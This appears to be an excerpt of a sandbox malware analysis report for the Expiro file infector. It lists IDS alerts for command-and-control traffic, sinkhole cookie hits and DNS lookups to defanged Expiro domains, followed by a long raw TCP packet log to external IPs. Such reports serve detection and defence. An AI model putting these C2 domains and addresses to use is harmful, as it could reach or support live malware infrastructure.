                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:49.539296+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.449764TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:49.539296+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.449764TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:50.475191+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.449765TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:37:50.475191+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.449765TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:38:02.711736+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.449787TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:38:02.711736+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.449787TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:38:08.321137+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.44982434.211.97.4580TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:38:13.503761+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.449850TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:38:13.503761+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.449850TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:38:17.064873+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.254.94.18580192.168.2.449873TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:38:17.064873+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.254.94.18580192.168.2.449873TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:38:27.780922+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.449935TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:38:27.780922+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.449935TCP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:38:36.094787+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.4604871.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:39:02.026892+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.4538381.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                        2024-10-28T16:39:08.047629+01002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.4508391.1.1.153UDP

                                                                                                                                                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:04.390322924 CET4973080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:04.395658970 CET804973054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:04.395739079 CET4973080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:04.395920038 CET4973080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:04.395936012 CET4973080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:04.401266098 CET804973054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:04.401283026 CET804973054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.225667953 CET804973054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.230097055 CET4973080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.236310005 CET804973054.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.236387014 CET4973080192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.296840906 CET4973180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.302444935 CET804973118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.302519083 CET4973180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.302685976 CET4973180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.302704096 CET4973180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.309077978 CET804973118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.309094906 CET804973118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.358040094 CET4973280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.363430977 CET804973254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.363511086 CET4973280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.363671064 CET4973280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.363697052 CET4973280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.368944883 CET804973254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.369213104 CET804973254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.196400881 CET804973254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.196615934 CET4973280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.202512980 CET804973254.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.202580929 CET4973280192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.263681889 CET4973380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.269289970 CET804973318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.269366980 CET4973380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.271759987 CET4973380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.272067070 CET4973380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.277481079 CET804973318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.277513981 CET804973318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.748608112 CET804973118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.748821020 CET4973180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.754839897 CET804973118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.755080938 CET4973180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.810467005 CET4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.815882921 CET804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.815962076 CET4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.816139936 CET4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.816159964 CET4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.821595907 CET804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.821743011 CET804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.677804947 CET804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.678400993 CET4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.684477091 CET804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.684542894 CET4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.732702017 CET804973318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.754028082 CET4973380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.760195017 CET804973318.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.760987043 CET4973380192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.923878908 CET4973580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.929573059 CET804973544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.929651976 CET4973580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.929778099 CET4973580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.929807901 CET4973580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.935174942 CET804973544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.935237885 CET804973544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.025507927 CET4973680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.031157970 CET804973654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.031249046 CET4973680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.031359911 CET4973680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.031398058 CET4973680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.036725044 CET804973654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.037239075 CET804973654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.618495941 CET804973544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.654180050 CET804973544.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.654263973 CET4973580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.696001053 CET4973580192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.865279913 CET804973654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.865468025 CET4973680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.871170044 CET804973654.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.871558905 CET4973680192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.932224035 CET4973780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.937676907 CET804973744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.937784910 CET4973780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.937984943 CET4973780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.938003063 CET4973780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.943411112 CET804973744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.943444967 CET804973744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.340797901 CET4973780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.369271994 CET4973880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.374705076 CET804973844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.374806881 CET4973880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.375129938 CET4973880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.375129938 CET4973880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.380485058 CET804973844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:09.380496979 CET804973844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.040299892 CET804973844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.041393995 CET4973880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.047678947 CET804973844.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.047817945 CET4973880192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.137711048 CET4973980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.143078089 CET8049739172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.143832922 CET4973980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.144428015 CET4973980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.144540071 CET4973980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.149957895 CET8049739172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.149970055 CET8049739172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.804972887 CET8049739172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.805335999 CET4973980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.805335999 CET4973980192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.810703993 CET8049739172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.834805965 CET4974080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.840244055 CET8049740172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.840327024 CET4974080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.840492010 CET4974080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.840492010 CET4974080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.845853090 CET8049740172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.845884085 CET8049740172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.503525019 CET8049740172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.503628969 CET4974080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.503825903 CET4974080192.168.2.4172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.509156942 CET8049740172.234.222.143192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.628998995 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.634530067 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.635051966 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.635205984 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.635219097 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.640495062 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.640506983 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.057900906 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.068227053 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.074338913 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.074758053 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.312128067 CET4974280192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.317590952 CET804974282.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.317717075 CET4974280192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.318017960 CET4974280192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.318042040 CET4974280192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.323528051 CET804974282.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.323574066 CET804974282.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.805856943 CET804974282.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.806022882 CET4974280192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.806813002 CET4974280192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.812215090 CET804974282.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.877970934 CET4974780192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.884269953 CET804974782.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.884356976 CET4974780192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.884516001 CET4974780192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.884533882 CET4974780192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.889904022 CET804974782.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:21.890207052 CET804974782.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:25.341105938 CET4974780192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:25.476370096 CET4975080192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:25.481925011 CET804975082.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:25.482048035 CET4975080192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:25.482213974 CET4975080192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:25.482342958 CET4975080192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:25.487605095 CET804975082.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:25.487801075 CET804975082.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:29.325176001 CET4975080192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:29.397222996 CET4975180192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:29.402966022 CET804975182.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:29.403122902 CET4975180192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:29.403403997 CET4975180192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:29.403445959 CET4975180192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:29.408875942 CET804975182.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:29.408898115 CET804975182.112.184.197192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:33.414180040 CET4975180192.168.2.482.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:33.736891985 CET4975280192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:33.742443085 CET804975247.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:33.742537022 CET4975280192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:33.742664099 CET4975280192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:33.742685080 CET4975280192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:33.748087883 CET804975247.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:33.748126984 CET804975247.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.204986095 CET804975247.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.205313921 CET4975280192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.211530924 CET804975247.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.211591005 CET4975280192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.390280008 CET4975380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.395643950 CET804975313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.395730019 CET4975380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.395889997 CET4975380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.395915985 CET4975380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.401299953 CET804975313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.401379108 CET804975313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.850178957 CET804975313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.850502014 CET4975380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.856537104 CET804975313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.856616974 CET4975380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.978316069 CET4975480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.984090090 CET804975444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.984193087 CET4975480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.984323025 CET4975480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.984335899 CET4975480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.989854097 CET804975444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.989984035 CET804975444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.641170979 CET804975444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.641412020 CET4975480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.647383928 CET804975444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.647448063 CET4975480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.810585976 CET4975580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.816081047 CET804975518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.816184998 CET4975580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.816354036 CET4975580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.816354036 CET4975580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.821851015 CET804975518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.822098017 CET804975518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.262722969 CET804975518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.262922049 CET4975580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.268927097 CET804975518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.269143105 CET4975580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.442866087 CET4975680192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.448635101 CET8049756172.234.222.138192.168.2.4
